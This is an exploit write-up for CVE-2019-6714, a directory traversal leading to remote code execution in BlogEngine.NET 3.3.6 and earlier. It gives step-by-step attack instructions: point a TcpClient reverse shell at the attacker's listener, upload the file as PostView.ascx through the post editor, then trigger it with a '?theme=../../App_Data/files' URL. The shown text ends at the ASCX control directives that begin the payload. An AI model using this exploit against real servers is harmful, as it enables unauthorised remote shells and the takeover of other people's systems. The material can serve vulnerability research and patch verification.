# Exploit Title: BlogEngine.NET <= 3.3.6 Directory Traversal RCE # Date: 02-11-2019 # Exploit Author: Dustin Cobb # Vendor Homepage: https://github.com/rxtur/BlogEngine.NET/ # Software Link: https://github.com/rxtur/BlogEngine.NET/releases/download/v3.3.6.0/3360.zip # Version: <= 3.3.6 # Tested on: Windows 2016 Standard / IIS 10.0 # CVE : CVE-2019-6714 /* * CVE-2019-6714 * * Path traversal vulnerability leading to remote code execution. This * vulnerability affects BlogEngine.NET versions 3.3.6 and below. This * is caused by an unchecked "theme" parameter that is used to override * the default theme for rendering blog pages. The vulnerable code can * be seen in this file: * * /Custom/Controls/PostList.ascx.cs * * Attack: * * First, we set the TcpClient address and port within the method below to * our attack host, who has a reverse tcp listener waiting for a connection. * Next, we upload this file through the file manager. In the current (3.3.6) * version of BlogEngine, this is done by editing a post and clicking on the * icon that looks like an open file in the toolbar. Note that this file must * be uploaded as PostView.ascx. Once uploaded, the file will be in the * /App_Data/files directory off of the document root. The admin page that * allows upload is: * * http://10.10.10.10/admin/app/editor/editpost.cshtml * * * Finally, the vulnerability is triggered by accessing the base URL for the * blog with a theme override specified like so: * * http://10.10.10.10/?theme=../../App_Data/files * */ <%@ Control Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Web.Controls.PostViewBase" %> <%@ Import Namespace="BlogEngine.Core" %>